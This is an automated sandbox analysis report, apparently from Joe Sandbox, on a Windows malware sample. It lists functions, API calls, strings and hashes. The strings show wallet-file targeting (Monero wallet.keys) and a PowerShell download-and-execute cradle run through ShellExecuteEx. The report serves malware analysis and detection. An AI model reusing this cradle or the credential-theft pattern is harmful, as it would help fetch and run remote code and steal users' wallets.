                              • RtlAllocateHeap.NTDLL(00000000), ref: 006576AB
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBA28,00000000,00020119,00000000), ref: 006576DD
                              • RegQueryValueExA.ADVAPI32(00000000,013DE400,00000000,00000000,?,000000FF), ref: 006576FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00657708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 15480b042610401b1af09e374717cf16de932481d8aea3da7d2f653edcd137ba
                              • Instruction ID: eff77a0c65314794ecf8edd6cda73eaaf4b32aca6e4d5e9026e71fe139281edb
                              • Opcode Fuzzy Hash: 15480b042610401b1af09e374717cf16de932481d8aea3da7d2f653edcd137ba
                              • Instruction Fuzzy Hash: 35014FB5A04204BBFB04DBE8EC49FAAB7B9FB48702F104455FE04A72D0D67499048B61
                              Function 00657720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0065773B
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBA28,00000000,00020119,006576B9), ref: 0065775B
                              • RegQueryValueExA.ADVAPI32(006576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0065777A
                              • RegCloseKey.ADVAPI32(006576B9), ref: 00657784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: eb9fb0b747e0561c79ce444ef5ce1438e88161648b4b080691b8a9c6d473d680
                              • Instruction ID: 5c35be562561537c2dcbc25a60155891cbb70901a323f7ce4630cfd793cda3d5
                              • Opcode Fuzzy Hash: eb9fb0b747e0561c79ce444ef5ce1438e88161648b4b080691b8a9c6d473d680
                              • Instruction Fuzzy Hash: 5E0112B5A40308BFFB04DBE8DC4AFAEB7B8FB48701F104559FA05A72D1DA755A048B61
                              Function 006592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(:e,80000000,00000003,00000000,00000003,00000080,00000000,?,00653AEE,?), ref: 006592FC
                              • GetFileSizeEx.KERNEL32(000000FF,:e), ref: 00659319
                              • CloseHandle.KERNEL32(000000FF), ref: 00659327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :e$:e
                              • API String ID: 1378416451-1916817931
                              • Opcode ID: 93b0355c17e57e6ff19c20c74098cd572044ca38f1480d7313628de69f79c8a3
                              • Instruction ID: 886c4dfb1670cb194ca3ed4e66e3fc2a7dc949a7a4e1cb45095493c8b8104623
                              • Opcode Fuzzy Hash: 93b0355c17e57e6ff19c20c74098cd572044ca38f1480d7313628de69f79c8a3
                              • Instruction Fuzzy Hash: FEF03C35E40208FBEB14DBB4DC49B9E77FAFB48711F108254BA91A72C0D67596059F50
                              Function 006540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 006540D5
                              • RegOpenKeyExA.ADVAPI32(80000001,013DDC98,00000000,00020119,?), ref: 006540F4
                              • RegQueryValueExA.ADVAPI32(?,013DE778,00000000,00000000,00000000,000000FF), ref: 00654118
                              • RegCloseKey.ADVAPI32(?), ref: 00654122
                              • lstrcat.KERNEL32(?,00000000), ref: 00654147
                              • lstrcat.KERNEL32(?,013DE730), ref: 0065415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 3acfd72201a8aa09e46a95188d1413ce5b80352a608a13bfdfb2e6582c277900
                              • Instruction ID: 26a2769b6812c0ce872c77ce3ab19c52a0e8a42ce59838f2c67d9ace79865a47
                              • Opcode Fuzzy Hash: 3acfd72201a8aa09e46a95188d1413ce5b80352a608a13bfdfb2e6582c277900
                              • Instruction Fuzzy Hash: DE4199B6910108ABDB18EBA4DC56FFE737DBB48300F00455DB616571C1EA755B8C8BA2
                              Function 006499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                              • LocalFree.KERNEL32(0064148F), ref: 00649A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 15618e0a4ac4ca70a33cdd8850a6152d7cd63aabdad008ed0b7a942869f58137
                              • Instruction ID: f5bb278fe94bbe14ee03086e7f1e8b4b5b19328bf0430c493b7141e1491d57c8
                              • Opcode Fuzzy Hash: 15618e0a4ac4ca70a33cdd8850a6152d7cd63aabdad008ed0b7a942869f58137
                              • Instruction Fuzzy Hash: EC3129B4A40209EFDB14DF94C885BEE77B6FF48301F108158E911A7390D779AA81CFA1
                              Function 0065C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 598039bae654077f05d4b1906643227b709290de06dc972db60ae187d4561bcf
                              • Instruction ID: 6d97aad5b9031d2625dcd09a061ca2218dd1144537c6acc24b0c9d14747ca227
                              • Opcode Fuzzy Hash: 598039bae654077f05d4b1906643227b709290de06dc972db60ae187d4561bcf
                              • Instruction Fuzzy Hash: 0A4104B110079C5EDB218B248C84FFBBBFAAF45715F1444ECED8A86182D2719A49DF64
                              Function 00654780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,013DE658), ref: 006547DB
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654801
                              • lstrcat.KERNEL32(?,?), ref: 00654820
                              • lstrcat.KERNEL32(?,?), ref: 00654834
                              • lstrcat.KERNEL32(?,013CA710), ref: 00654847
                              • lstrcat.KERNEL32(?,?), ref: 0065485B
                              • lstrcat.KERNEL32(?,013DDC78), ref: 0065486F
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658D90: GetFileAttributesA.KERNEL32(00000000,?,00641B54,?,?,0066564C,?,?,00660E1F), ref: 00658D9F
                                • Part of subcall function 00654570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00654580
                                • Part of subcall function 00654570: RtlAllocateHeap.NTDLL(00000000), ref: 00654587
                                • Part of subcall function 00654570: wsprintfA.USER32 ref: 006545A6
                                • Part of subcall function 00654570: FindFirstFileA.KERNEL32(?,?), ref: 006545BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 33394e8d349052598ab01ecc8c15f13d21bbb0ce9398977df2f4c6e7974d1f5b
                              • Instruction ID: 9dd8ac484fba2400d6af6390adcdfb6261652275b612eb1f80c30d4e6ee80b14
                              • Opcode Fuzzy Hash: 33394e8d349052598ab01ecc8c15f13d21bbb0ce9398977df2f4c6e7974d1f5b
                              • Instruction Fuzzy Hash: A6319FB2900208ABDB54FBB4DC85EE9737DBB48300F40459DB719A6081EE74978DCBA9
                              Function 00652C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00652D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00652D04
                              • <, xrefs: 00652D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00652CC4
                              • ')", xrefs: 00652CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 63977348a7cc3f69dda78625b354438eb468cbfba78457972feb39cd34a09b73
                              • Instruction ID: 25fd6c0a8c6d0932d5e0b4a816e6846b460db7b4b8d5c49aaa1637fd6bc80696
                              • Opcode Fuzzy Hash: 63977348a7cc3f69dda78625b354438eb468cbfba78457972feb39cd34a09b73
                              • Instruction Fuzzy Hash: 8141BD71C102089ADB58EFE0C892BEDBB76BF14301F40422DE916A7191EF756A4ECF95
                              Function 00649E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00649F41
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 2f68b934bb88489955f7041d8671b1d7a51f49eeb8b3b5ee44a61ab1bb236d92
                              • Instruction ID: 9c88cdf2289fb8a6153f6d255c55141f75bf2e0c981d8700d6f9446de6995b69
                              • Opcode Fuzzy Hash: 2f68b934bb88489955f7041d8671b1d7a51f49eeb8b3b5ee44a61ab1bb236d92
                              • Instruction Fuzzy Hash: CF614070A10248EBDB14EFE4CD96FEE777AAF45304F008118F90A5F191EB746A4ACB56
                              Function 006570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • memset.MSVCRT ref: 0065716A
                              Strings
                              • se, xrefs: 006572AE, 00657179, 0065717C
                              • se, xrefs: 00657111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0065718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemset
                              • String ID: se$se$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 4047604823-3776805429
                              • Opcode ID: 7bfa5b057b428917d151e0fde2c9b7a9d64cdd1e42a8bff5c806f988811fb4f8
